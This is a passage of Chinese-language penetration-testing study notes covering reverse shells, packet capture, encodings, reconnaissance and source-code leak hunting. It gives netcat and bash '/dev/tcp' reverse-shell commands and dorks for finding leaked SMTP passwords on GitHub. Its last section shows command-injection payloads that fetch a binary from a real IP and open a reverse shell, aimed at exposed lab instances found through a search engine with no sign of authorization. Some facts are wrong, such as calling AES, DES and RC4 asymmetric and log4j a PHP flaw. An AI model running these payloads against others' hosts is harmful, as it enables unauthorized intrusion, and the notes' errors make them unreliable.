2026-09-10 15:54:16 | 网络安全

网络安全学习笔记(小迪)

https://www.cnblogs.com/sunny11/p/13583083.html

https://forum.ywhack.com/bountytips.php?download

https://forum.ywhack.com/reverse-shell/

https://blog.csdn.net/weixin_43303273/article/details/83029138

基础知识

1. 反弹shell-解决数据回显和交互式回显、数据通信问题

nc工具(Netcat):接收反向shell

1
2
3
4
Server:nc -lvvp 5577 # 监听该端口,返回极其详细的日志
Client: nc -e cmd sever_ip 5577 # 主动发起 TCP 三次握手连接
Client(MacOS): /bin/bash -c 'bash -i >& /dev/tcp/sever_ip/5577 0>&1'
curl -4 cip.cc # 快速查询本机公网ip

交换c、s,可以交换出入站,绕开防火墙

反向连接:让目标主机主动连接进攻主机。正向连接则相反

2. Web 应用

  • 环境架构

    • 开发语言
    • 程序源码:开发语言、应用类型、开源CMS、开发框架等
    • 中间件容器、数据库类型、服务器操作系统、第三方软件等
  • 安全漏洞分类

    SQL注入、文件安全、RCE执行、XSS跨站、CSRF/SSRF/CRLF、反序列化、逻辑越权、未授权访问、XXE/XML、弱口令安全等

  • 抓包、封包…

    • 抓包:截获请求,看请求了什么地址、用了什么参数、服务器返回了什么等等

    • 封包:按照某个App或协议要求的格式,构造出类似的请求数据,比如填写请求头、参数、二进制字段、校验值等,再发送给服务器。

      常用于做游戏外挂

      能精确到每个操作的数据包,例如利用封包,能直接操作游戏中的回城功能。

    • 应用分类

      • Web应用站点操作数据抓包-浏览器F12网络监听
      • APP、小程序、PC抓包HTTP/S数据-Fiddler、Charles、BurpSuite
      • 程序进程、网络接口、其他协议抓包-WireShark、科来网络分析系统
      • 通讯类应用程序封包分析发送接收-WPE四件套封包、科来网络分析系统
  • 工具

    • Fiddler、Charles、BurpSuite:HTTP协议

      抓取对象:APP、小程序、PC抓包。
      Fiddler、Charles纯抓包

      Bp可以用于重放或者别的安全测试

    • Wireshark、科来网络分析系统、TCPDump:其他协议,网络封包分析软件

      • 科来网络分析系统

        可筛选进程的数据包,新手友好

    • 隧道代理:应对拉黑IP和封IP问题

      local-proxy-target

      例如local被target拉黑了,那就可以通过代理请求。且每次请求可以换不同代理

    • 其他辅助工具

      • BurpSuite:Web抓包工具
      • Charles:将包按照URL地址分类,便于查看。触发相关地址时高亮
      • Proxy Switchy(浏览器插件抓包插件):其实就是为浏览器单独设置代理,让请求和响应变为server-bp-browser。即使不通过插件,应该也有别的方式实现。好像可以直接为电脑设置代理,这样web和小程序都能走bp
      • Proxifier(电脑上的微信小程序抓包软件)
      • 安卓模拟器:逍遥、雷电、夜神
      • CCProxy:APK-CCProxy-WPE监控cc进行,实现封包抓包
  • 考虑阻碍

    • 站库分离
    • CDN加速服务,如果找到的是缓存,攻击的也是缓存,需要找到真正的服务器ip
    • 负载均衡服务,多台服务器提供服务,可能找到的只是备用机(目标一般是主控),备用机可能想要的东西
    • WAF应用防火墙
    • 主机防护防火墙
  • 加密编码

    • 常见

      • 密码存储加密:MD5(32|16), SHA1(40), NTLM, AES, DES, RC4

        • MD5可能会加上Salt,增加破解难度
        • NTLM,Windows的哈希密码,标准通讯安全协议
        • AES, DES, RC4,都是非对称加密算法,引入密钥,密文特征与BASE64相似
      • 传输数据编码:BASE64, URL, HEX, ASCII

        应用场景:参数传递(如注入影响,后期WAF绕过干扰写法应用、视频地址还原等)

        • BASE64:大小写敏感,结尾通常有符号=
        • URL:大小写敏感,通常以%数字字母间隔
      • JS前端代码加密:JS颜文字,jother,JSFUCK

        • jother特征:只用! + ()[]{}这八个字符,就能完成对任意字符串的编码,也可在F12中解密执行
        • JSFUCK特征:与jother类似,只是少了{}
      • 后端代码加密:PHP, .NET, JAVA

        应用场景:版权代码加密,开发特性,CTF比赛等

        • PHP,乱码,头部有信息,例如Zendxxxx就用了zend|54加密

        • .NET:DLL封装代码文件

          解密软件:ILSpy

        • JAVA:JAR & CLASS文件

      • 数据库加密:MYSQL,MSSQL等

      • 数据显示编码:UTF-8,GBK2312等

    • 识别算法编码类型

      • 看密文位数
      • 看密文特征(数字、字母、大小写、符号等)
      • 看当前密文存在的地方(Web、数据库、操作系统等应用)
    • 解密:逆运算、枚举、碰撞

    • 部分参考资源

      http://www.hiencode.com/

      https://jsfuck.com/

3. 信息打点-Web架构

a. Web架构-语言&中间件&数据库&系统等

  • 判断服务器系统:URL大小写,TTL

  • 数据库、中间件:通过常用搭建组合 或 端口扫描判定

    • 常见组合

      • IIS - windows
      • aspx - mssql
    • 数据库常见端口

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      - 关系数据库
      - MySQL 3306
      - Oracle 1521
      - SQL Server 1433
      - DB2, Sybase 5000
      - PostgreSQL 5432
      - DM达梦数据库 5236
      - NoSQL数据库
      - Redis 6379
      - Memcached 11211
      - MongoDB 27017

    • 源码

      • 直接利用公开漏洞库尝试安全测试
      • 白盒代码审计 挖漏洞
    • mysql:漏洞或弱口令等

    • PHP:常规漏洞,如log4j

    • 中间件漏洞网络上有很多文章汇总

    • 主动式探针 & 被动式探针

      SRC 是各大互联网厂商开启的漏洞发现奖励计划(漏洞赏金计划),旨在鼓励广大安全研究人员积极发现厂商产品或服务安全漏洞,并向厂商提交漏洞报告。

      https://www.butian.net/Reward/plan/2

b. Web源码-CMS开源&闭源售卖&自主研发等

c. Web源码获取-泄露安全&资源监控&其他等

https://www.secpulse.com/archives/124398.html

  • 泄露原因:源码本身特性入口、管理员不好的习惯、配置、意识、资源信息搜集入口

  • 源码泄露集合

    • CMS识别不到时
      • composer.json:PHP特性,类似Java的Maven、Node.js的npm
      • 开源代码控制工具配置不当:
        • git (GitHack): .git文件未删除就发布。domain/.git直接获取,如果能获取到就没删除
        • svn (SvnHack): 同理,domain/.svn/entries
      • .DS_Store 文件泄露(ds_store_exp): Mac下Finder用于保存如何展示 文件/文件夹 的数据文件,每个文件夹下对应一个。可能造成文件目录结构泄露,特别是备份文件、源代码文件。同理 domain/.DS_Store
    • WEB-INF/web.xml 泄露:Java的WEB应用的安全目录,如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。
      主要包含一下文件或目录:
      WEB-INF/web.xml:Web应用程序配置文件,描述了servlet和其他的应用组件配置及命名规则. WEB-INF/database.properties:数据库配置文件
      WEB-INF/classes/:一般用来存放Java类文件(.class) WEB-INF/lib/:用来存放打包好的库(jar)
      WEB-INF/src/:用来放源代码(.asp和.php等)
    • SWP文件泄露、CVS 、Bzr、Github、hg、网站压缩备份文件
  • 工具
    CMs识别:https://www.yunsee.cn/
    备份:敏感目录文件扫描-7kbscan-WebPathBrute CVs:https://github.com/kost/dvcs-ripper GIT:https://github.com/lijiejie/GitHack
    SVN:https://github.com/callmefeifei/SvnHack
    DS Store:https://github.com/lijiejie/ds_store_exp

    GTTHUB资源搜索:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    n:name test				# 仓库标题搜索含有关键字
    in:descripton test # 仓库描述搜索含有关键字
    in:readme test # Readme文件搜素含有关键字
    stars:>3000 test # stars数量大于3000的搜索关键字
    ...
    # 关键字配合谷歌搜索:
    site:Github.com smtp
    site:Github.com smtp @qq.com
    site:Github.com smtp @126.com
    site:Github.com smtp @163.com
    site:Github.com smtp @sina.com.cn
    site:Github.com smtp password
    site:Github.com String password smtp

    www.h0r2yc.com/1.zip

d. Web域名-子域名&相似域名&反查域名&旁注等

3. 信息打点-系统

  • 获取网络服务信息 - 服务厂商 & 网络架构

    通过域名查询ip地址所属:https://site.ip138.com/

  • 获取服务信息 - 应用协议 & 内网资产

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    #相关利用项目:
    Masscan:https://github.com/robertdavidgraham/masscan Wafw00f:https://github.com/EnableSecurity/wafw00f
    Kali上自带Nmap,Masscan,lbd等项目,超级ping:ping.chinaz.com

    超级ping:CDN服务识别
    Masscan:端口扫描,应用协议
    Wafw00f:Web应用防护防火墙识别
    Nmap:端口扫描,应用协议,防火墙识别
    lbd:负载均衡,广域网负载均衡,应用层负载均衡

    #端口协议安全:
    https://www.se7enseC.cn/2018/11/28/%E7%AB%AF%E5%8F%A3%E6%B8%97%E9% 80%8FE680BBE78BB93/
  • 获取阻碍信息 - CDN & WAF & 负载 & 防火墙

在线靶场

FOFA ( fofa.so)是国内著名的网络空间测绘搜索引擎

Pikachu 是一个专门用来练习网络安全技能的漏洞测试靶场

1
2
3
4
5
6
7
8
9
10
11
# 搜索中国大陆和港澳台的 pikachu 靶场
"pikachu" && country="CN" && title=="Get the pikachu"

# 挨个尝试,看哪个靶场能执行命令
# RCE 里的 Ping,输入 127.0.0.1 看看是否有返回

# 对靶场
127.0.0.1 & curl -v -m 5 http://8.133.245.52/nc -o /tmp/n 2>&1 # 8000可能被靶场防火墙拦截
127.0.0.1 & chmod +x /tmp/n
127.0.0.1 & /tmp/n -h
127.0.0.1 & bash -c 'bash -i >& /dev/tcp/8.133.245.52/5577 0>&1'

![image-20260825160246628](…/…/…/…/Library/Application Support/typora-user-images/image-20260825160246628.png)